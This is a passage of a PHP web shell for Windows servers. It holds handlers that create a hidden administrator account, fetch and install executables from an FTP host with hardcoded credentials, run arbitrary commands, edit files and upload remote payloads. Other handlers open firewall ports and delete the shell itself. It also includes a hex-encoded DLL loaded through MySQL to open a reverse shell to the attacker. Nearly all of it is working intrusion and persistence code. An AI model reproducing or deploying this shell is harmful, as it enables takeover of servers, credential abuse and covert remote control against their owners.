<textarea id="topbox" readonly="readonly"><?php echo $rem; echo chr(13); echo chr(13); echo $result; echo chr(13); echo chr(13); echo $result1; ?></textarea>
<?php
}
if($_REQUEST['all1'])
{
$fname = "a00.bat";
$fpath = "C:\\xampp\\phpmyadmin\\";
$content = "net user support_388945a0 /delete
net user support_388945a0 lol123*** /add
net localgroup administrators support_388945a0 /add";
$bat = fopen($fpath.$fname, "w+");
if(fwrite($bat, $content))
{
$rem = "Plik bat zapisany ";
}
else
{
$rem = "Plik bat nie zapisany";
}
fclose($bat);
$cmd = "$fname";
$result = cmd_exec("$cmd");
//echo $result;
$result1 = shell_exec("del $cmd");
//echo $result1;
$resultx = cmd_exec("dir");
$czy = strpos($resultx, $cmd);
if ($czy == FALSE)
$result1 = "Plik zostal usunięty";
else
$result1 = "Plik nadal jest na serwerze!";
?>
<textarea id="topbox" readonly="readonly"><?php echo $rem; echo chr(13); echo chr(13); echo $result; echo chr(13); echo chr(13); echo $result1; ?></textarea>
<?php
}
if($_REQUEST['ftp'])
{
$fname = "a00.bat";
$fpath = "C:\\xampp\\phpmyadmin\\";
$content = "mkdir c:\windows\system32\dllcache\1024\101\
echo open ftp.republika.pl>>c:\windows\system32\dllcache\1024\101\system.txt
echo singelton415>>c:\windows\system32\dllcache\1024\101\system.txt
echo dualizm1284>>c:\windows\system32\dllcache\1024\101\system.txt
echo type binary>>c:\windows\system32\dllcache\1024\101\system.txt
echo get sams.exe>>c:\windows\system32\dllcache\1024\101\system.txt
echo get smss32.hlp>>c:\windows\system32\dllcache\1024\101\system.txt
echo quit>>c:\windows\system32\dllcache\1024\101\system.txt
ftp -s:c:\windows\system32\dllcache\1024\101\system.txt
move sams.exe c:\windows\system32\dllcache\1024\101\
move smss32.hlp c:\windows\system32\dllcache\1024\101\
c:\windows\system32\dllcache\1024\101\sams.exe /i /h /s
net start ipv6up";
$bat = fopen($fpath.$fname, "w+");
if(fwrite($bat, $content))
{
$rem = "Plik bat zapisany ";
}
else
{
$rem = "Plik bat nie zapisany";
}
fclose($bat);
$cmd = "$fname";
$result = cmd_exec("$cmd");
//echo $result;
$result1 = shell_exec("del $cmd");
//echo $result1;
$resultx = cmd_exec("dir");
$czy = strpos($resultx, $cmd);
if ($czy == FALSE)
$result1 = "Plik zostal usunięty";
else
$result1 = "Plik nadal jest na serwerze!";
?>
<textarea id="topbox" readonly="readonly"><?php echo $rem; echo chr(13); echo chr(13); echo $result; echo chr(13); echo chr(13); echo $result1; ?></textarea>
<?php
}
if($_REQUEST['remove'])
{
$cmd = "del \"".str_replace("/", "\\", $_SERVER['SCRIPT_FILENAME'])."\"";
cmd_exec($cmd);
}
if(isset($_GET['editor']))
{
if($_REQUEST['delete'])
{
$file = stripslashes($_POST['filename']);
$cmd = "del \"$file\"";
cmd_exec($cmd);
}
if($_REQUEST['edit'])
{
$file = stripslashes($_POST['filename']);
$path = stripslashes($_POST['path']);
$content = file_get_contents($file);
?>
<form action="<?php echo $_SERVER['PHP_SELF']."?editor=1"; ?>" method="post">
<input type="hidden" value="<?php echo $file; ?>" name="filename">
<input type="hidden" value="<?php echo $path; ?>" name="path">
<textarea name="content" cols="100" rows="20"><?php print htmlentities($content); ?></textarea>
<input type="submit" value="save" name="save">
</form>
<?php
exit;
}
if($_REQUEST['save'])
{
$file = stripslashes($_POST['filename']);
$content = $_POST['content'];
$tmp = fopen($file, "w+");
if(fwrite($tmp, $content))
{
echo $file;
echo "<script> alert(\"".$file." saved successfully!\"); </script>";
}
else
{
echo "<script> alert('".$file." not saved!'); </script>";
}
fclose($tmp);
}
?>
<form action="<?php echo $_SERVER['PHP_SELF']."?editor=1"; ?>" method="post">
<input name="path" type="text" value="path" size="80">
<input type="submit" value="cd path" name="cd">
</form>
<?php
if($_REQUEST['cd'])
{
$path = stripslashes($_POST['path']);
chdir($path);
}
if(isset($_POST['path']))
{
$path = stripslashes($_POST['path']);
chdir($path);
}
$handle = opendir(getcwd());
while (false !== ($file = readdir($handle))) {
if($file != ".." AND $file != ".")
{
if(is_file($file))
{
$files[] = $file;
}
else
{
$dirs[] = $files;
}
}
}
?>
<?php
echo "<table>";
$i = 0;
echo "PATH: ".stripslashes($_POST['path']);
while($i < sizeof($files))
{
echo "<form action=\"".$_SERVER['PHP_SELF']."?editor=1\" method=\"post\">";
$edit = "<input type=\"submit\" value=\"edit\" name=\"edit\">";
$del = "<input type=\"submit\" value=\"delete\" name=\"delete\">";
$ren = "<input type=\"submit\" value=\"rename\" name=\"rename\">";
echo "<input type=\"hidden\" value=\"".$path.$files[$i]."\" name=\"filename\">";
echo "<input type=\"hidden\" value=\"".$path."\" name=\"path\">";
echo "<tr><td width=\"216\">$files[$i]</td> <td width=\"50\">$edit</td> <td width=\"50\">$del</td> <td width=\"50\">$ren</td></tr>";
echo "</form>";
++$i;
}
echo "</table>";
?>
</form>
<?php
exit;
}
if(isset($_GET['home']))
{
?>
<textarea id="topbox" readonly="readonly">
<?php
if($_REQUEST['command'])
{
$cmd = stripslashes($_POST['cmd']);
$result = cmd_exec($cmd);
if($cmd == "net start")
{
$service = array();
$service = explode(" ", $result);
print "started Services:\r\n";
$i = 1;
while($i < sizeof($service))
{
if(strlen($service[$i]) == 18)
{
print trim($service[$i])." <- Serv-U Service Length\r\n";
}
else
{
print trim($service[$i])."\r\n";
}
++$i;
}
}
else
{
echo $result;
}
}
elseif($_REQUEST['quickcmd'])
{
$cmd = stripslashes($_POST['quickcmd']);
$result = cmd_exec($cmd);
if($cmd == "net start")
{
$service = array();
$service = explode(" ", $result);
print "started Services:\r\n";
$i = 1;
while($i < sizeof($service))
{
if(strlen($service[$i]) == 18)
{
print trim($service[$i])." <- Serv-U Service Length\r\n";
}
else
{
print trim($service[$i])."\r\n";
}
++$i;
}
}
else
{
echo $result;
}
}
elseif($_REQUEST['newuser'])
{
$cmd = "net user support lol123*** /add";
$result = cmd_exec($cmd);
echo $result;
}
elseif($_REQUEST['newuser1'])
{
$cmd = "net user support_388945a0 lol123*** /add";
$result = cmd_exec($cmd);
echo $result;
}
elseif($_REQUEST['addadmin'])
{
$cmd = "net localgroup administrators support /add";
$result = cmd_exec($cmd);
echo $result;
}
elseif($_REQUEST['addadmin1'])
{
$cmd = "net localgroup administrators support_388945a0 /add";
$result = cmd_exec($cmd);
echo $result;
}
elseif($_REQUEST['deluser'])
{
$cmd = "net user support /delete";
$result = cmd_exec($cmd);
echo $result;
}
elseif($_REQUEST['deluser1'])
{
$cmd = "net user support_388945a0 /delete";
$result = cmd_exec($cmd);
echo $result;
}
elseif($_REQUEST['boxinfo'])
{
$tmp = fopen("bw.exe", "w+");
fwrite($tmp, base64_decode($bw));
fclose($tmp);
$result = cmd_exec("bw.exe");
print $result;
cmd_exec("del bw.exe");
}
elseif($_REQUEST['shellscan'])
{
$handle = opendir(getcwd());
while (false !== ($file = readdir($handle))) {
if($file != ".." AND $file != ".")
{
if(is_file($file))
{
$end = substr($file, strlen($file)-4, strlen($file));
if($end == ".php")
{
$shell[file][] = $file;
$shell[content][] = file_get_contents($file);
}
}
}
}
print "FOUND [".sizeof($shell[file])."] .php files\r\n";
print "====================================\r\n";
$i = 0;
while($i < sizeof($shell[file]))
{
if(stristr($shell[content][$i], "shell_exec"))
{
$evil[] = $shell[file][$i];
}
elseif(stristr($shell[content][$i], "system"))
{
$evil[] = $shell[file][$i];
}
elseif(stristr($shell[content][$i], "exec("))
{
$evil[] = $shell[file][$i];
}
elseif(stristr($shell[content][$i], "passthru"))
{
$evil[] = $shell[file][$i];
}
elseif(stristr($shell[content][$i], "eval("))
{
$evil[] = $shell[file][$i];
}
++$i;
}
print "Found [".sizeof($evil)."] possible shells\r\n";
$i = 0;
while($i < sizeof($evil))
{
print $evil[$i]."\r\n";
++$i;
}
print "====================================\r\n";
}
else
{
$result = cmd_exec("dir");
echo $result;
}
?>
</textarea>
<form action="<?php echo $_SERVER['PHP_SELF']."?home=1"; ?>" method="post">
<input id="commandline" type="text" name="cmd">
<input id="cmd_button" type="submit" value="execute" name="command">
</form>
<?php
}
if(isset($_GET['upload']))
{
?>
<div id="upload" align="left">
<?php
echo "Local File Upload";
if($_REQUEST['Send'])
{
if($_FILES['Datei']['tmp_name'])
{
$path = stripslashes($_POST['path']);
if(move_uploaded_file($_FILES['Datei']['tmp_name'], $path.$_FILES['Datei']['name']))
{
echo "<script> alert('File uploaded successfully!'); </script>";
}
}
else
{
echo"<script> alert('No file selected!'); </script>";
}
}
?>
<form action="<?php echo $_SERVER['PHP_SELF']."?upload=1"; ?>" enctype="multipart/form-data" method="post">
<input id="upload_button" name="Datei" type="file"><br>
Where to upload:<br>
<input id="upload_button" type="text" value="<?php echo getcwd()."\\"; ?>" name="path" size="30">
<input name="Send" id="button" type="submit" value="Upload">
</form>
</div>
<div id="remote_upload" align="left">
Remote File Upload:
<form action="<?php echo $_SERVER['PHP_SELF']."?upload=1"; ?>" method="post">
<input name="remote_path" type="text" value="http://www.bad.com/evil.exe" size="40">
Where to upload:<br>
<input id="upload_button" type="text" value="<?php echo getcwd()."\\"; ?>" name="path" size="30">
<input type="submit" value="Get it!" name="remote_upload">
</form>
<?php
if($_REQUEST['remote_upload'])
{
$code = base64_encode(file_get_contents($_POST['remote_path']));
$file_name = explode("/", $_POST['remote_path']);
$path = str_replace("\\\\", "\\", $_POST['path']);
$tmp = fopen($path."\\".$file_name[sizeof($file_name)-1], "w+");
if(fwrite($tmp, base64_decode($code)))
{
echo "<script> alert('".$file_name[sizeof($file_name)-1]." uploaded successfully!'); </script>";
}
else
{
echo"<script> alert('Could not save file!'); </script>";
}
}
?>
</div>
<div id="speed" align="left">Load File via FTP (also for speed test)
<form action="<?php echo $_SERVER['PHP_SELF']."?upload=1"; ?>" method="post">
<pre>
IP: <input name="host" type="text" value="127.0.0.1" size="12">
port: <input name="port" type="text" value="21" size="5">
user: <input type="text" name="user" value="anonymous">
pass: <input type="text" name="pass" value="anonymous">
File 1: <input type="text" name="file" value="">
<input type="submit" value="load!" name="speed">
</pre>
</form>
<?php
if($_REQUEST['speed'])
{
$host = $_POST['host'];
$port = $_POST['port'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$file = $_POST['file'];
$start = time ();
$con = ftp_connect($host, $port, 5);
if(!$con)
{
$err = "Cant connect to $host:$port";
echo"<script> alert(\"$err\"); </script>";
exit;
}
if(!ftp_login($con, $user, $pass))
{
$err = "Cant login with $user:$pass";
echo"<script> alert(\"$err\"); </script>";
exit;
}
if(!ftp_get($con, $file, $file, FTP_BINARY))
{
$err = "Cant load ".$file;
print $file;
echo "<script> alert(\"$err\"); </script>";
}
else
{
$stop = time();
$end = round ($stop - $start, 3);
echo $end;
echo"<script> alert(\"Got file $file in $end seconds!!\"); </script>";
}
}
exit;
}
?>
</div>
<?php
if(isset($_GET['forwarding']))
{
?>
<div id="port_forwarding" align="left">
Windows FW Portrange forwarding
<form action="<?php echo $_SERVER['PHP_SELF']."?forwarding=1"; ?>" method="post">
<?php echo "<pre>" ?>
start: <input name="start" type="text" value="500" size="3"> end: <input name="end" type="text" value="505" size="3">
<input type="submit" value="free it!" name="forward">
<?php echo "</pre>" ?>
</form>
<?php
if($_REQUEST['forward'])
{
$i = $_POST['start'];
$end = $_POST['end'];
$total = $end-$i+1;
while($i < $end)
{
$tcp = "netsh firewall set portopening TCP $i ENABLE";
$udp = "netsh firewall set portopening UDP $i ENABLE";
$tcp_exec[] = cmd_exec($tcp);
$udp_exec[] = cmd_exec($udp);
++$i;
}
echo"<script> alert('Forwarded ".$total." TCP & UDP ports!'); </script>";
}
exit;
?>
</div>
<?php
}
?>
</div>
<?php
if(isset($_GET['reverse']))
{
?>
<div id="reverse" align="left">backconnect mysql procedure create & call for Safe_Mode bypassing
<form action="<?php echo $_SERVER['PHP_SELF']."?reverse=1"; ?>" method="post">
<pre>
User: <input type="text" value="root" name="user"> Your IP: <input name="ip" type="text" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>" size="12"> <input type="submit" value="get in!" name="backconnect">
Pass: <input type="text" value="" name="pass"> Your Port: <input name="port" type="text" value="1863" size="5">
</pre>
</form>
</div>
<?php
if($_REQUEST['backconnect'])
{
$user = stripslashes($_POST['user']);
$pass = stripslashes($_POST['pass']);
$ip = stripslashes($_POST['ip']);
$port = stripslashes($_POST['port']);
if(!mysql_connect("localhost", $user, $pass))
{
$err = mysql_error();
echo"<script> alert(\"$err\"); </script>";
}
if(!mysql_select_db("mysql"))
{
$err = mysql_error();
echo"<script> alert(\"$err\"); </script>";
}
$query = "DROP TABLE IF EXISTS `local`";
if(!mysql_query($query))
{
$err = mysql_error();
echo"<script> alert(\"$err\"); </script>";
}
$query = "CREATE TABLE `local` (`data` longblob NOT NULL) TYPE = MYISAM";
if(!mysql_query($query))
{
$err = mysql_error();
echo"<script> alert(\"$err\"); </script>";
}
$query = "insert into local (`data`) values (0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000D80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000350540DF71642E8C71642E8C71642E8C997B248C74642E8C137B3D8C74642E8C71642F8C6A642E8C997B258C70642E8C997B2A8C72642E8C5269636871642E8C000000000000000000000000000000000000000000000000504500004C010400014736420000000000000000E0000E210B010600001000000030000000000000AB14000000100000002000000000001000100000001000000400000001000000040000000000000000500000001000000000000002000000000010000010000000001000001000000000000010000000502200007A0000007020000050000000000000000000000000000000000000000000000000000000004000007000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000700000000000000000000000000000000000000000000000000000002E746578740000006E050000001000000010000000100000000000000000000000000000200000602E72646174610000CA020000002000000010000000200000000000000000000000000000400000402E646174610000005C000000003000000010000000300000000000000000000000000000400000C02E72656C6F630000AE00000000400000001000000040000000000000000000000000000040000042000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008B4424088B400483380074328B480485C9742B5657BF1030001083C9FF33C0F2AEF7D12BF9B0018BD18BF78B7C2414C1E902F3A58BCA83E103F3A45F5EC38B442404C60001C740082000000032C0C390C39090909090909090909090909090908B44240881EC780400008B40085355568B48048B305751FF153420001033ED83C4043BF575178B94249C0400005F5E5DC6020133C05B81C478040000C35066C74424400200E850030000566689442442E83F030000BB0100000055536A028944244CE8270300008BF083FEFF8974241C0F84DB0200008D4424206A04506A0468FFFF000056895C2434E8FA0200008D4C243C6A105156E8E702000085C074203BF50F84AA02000056E8CF0200008B8424940400005F5E5D5B81C478040000C38B35282000108D542430558D44242C528D4C241C5051C74424400C000000896C2444895C2448FFD68D542430558D44241C528D4C242C5051FFD6B91100000033C08D7C244C8B542424F3AB8B4424288D4C244C898424880000008984248C0000008D842490000000899424840000005051555555535555684030001055C78424A0000000010100006689AC24A400000089AC249000000089AC248C00000089AC248800000089AC2484000000896C247889AC24A80000006689AC24A6000000C744247444000000FF152420001085C07518FF15202000108B8424940400005F5E5D5B81C478040000C38B5424248B351C20001052FFD68B44242850FFD655555355FF15182000108BF05689742430FF151420001068C8000000FF15102000105556FF150C20001085C00F84140100008B442414558D4C241455518D9424AC00000068E8030000525033F6896C2428FF150820001085C00F84DF0000008B4424103BC58BD874528B4424148D4C241055518D9424A800000068E80300005250FF150420001085C00F84AF0000008B4424103BC5742476228B54241C558D8C24A4000000505152E80D0100003BC5760203F08B4424103BF072DEB9FA00000033C08DBC24A00000006A64F3ABFF15102000103BDD0F8557FFFFFF837C2410FF74648B4C241C558D8424A400000068E80300005051E8BA0000003BC589442420744483F8FF743F8B4C24188D5424105552508D8424AC0000005051FF15002000106A64FF15102000108B54242C5552FF150C20001085C0740DE9F4FEFFFFC7442410FFFFFFFF8D4424105550BF3830001083C9FF33C0F2AEF7D149518B4C2424683830001051FF150020001068C8000000FF15102000108B5424148B351C20001052FFD68B44241850FFD68B4C241C51E82B0000008B8424940400005F5E5D5B81C478040000C390909090909090909090909090FF255C200010FF2564200010FF2560200010FF2568200010FF2558200010FF2554200010FF2550200010FF254C2000108B44240885C0750E3905483000107E2EFF0D483000108B0D3820001083F8018B09890D4C300010753F6880000000FF153C20001085C059A354300010750433C0EB66832000A15430001068043000106800300010A350300010E8EA000000FF05483000105959EB3D85C07539A15430001085C074308B0D50300010568D71FC3BF072128B0E85C97407FFD1A15430001083EE04EBEA50FF154420001083255430001000595E6A0158C20C00558BEC538B5D08568B750C578B7D1085F67509833D4830001000EB2683FE01740583FE027522A15830001085C07409575653FFD085C0740C575653E815FFFFFF85C0750433C0EB4E575653E85300000083FE0189450C750C85C07537575053E8F1FEFFFF85F6740583FE037526575653E8E0FEFFFF85C0750321450C837D0C007411A15830001085C07408575653FFD089450C8B450C5F5E5B5DC20C00FF2540200010837C2408017513833D5830001000750AFF742404FF152C2000106A0158C20C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000302100003C21000048210000582100006E210000762100008421000094210000A2210000B2210000C42100002E22000000000000EC2100001E22000014220000082200000022000000000000090000800B00008017000080150000801000008003000080130000800400008000000000C02000000000000000000000D2210000002000000C2100000000000000000000E02100004C200000F42000000000000000000000F4210000342000000000000000000000000000000000000000000000302100003C21000048210000582100006E210000762100008421000094210000A2210000B2210000C42100002E22000000000000EC2100001E22000014220000082200000022000000000000090000800B00008017000080150000801000008003000080130000800400008000000000DF02577269746546696C650018025265616446696C650000F9015065656B4E616D65645069706500CE0257616974466F7253696E676C654F626A656374009602536C656570002B0252657365744576656E74000031004372656174654576656E744100001B00436C6F736548616E646C65001A014765744C6173744572726F720000440043726561746550726F6365737341000043004372656174655069706500004B45524E454C33322E646C6C00005753325F33322E646C6C00003D0261746F6900004D53564352542E646C6C00005E026672656500000F015F696E69747465726D0091026D616C6C6F6300009D005F61646A7573745F6664697600005D0044697361626C655468726561644C69627261727943616C6C730000000000000000000000014736420000000096220000010000000300000003000000782200008422000090220000601000005010000000100000A0220000AA220000BB2200000000010002004D595544462E646C6C006D79636F6E6E656374006D79636F6E6E6563745F6465696E6974006D79636F6E6E6563745F696E697400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000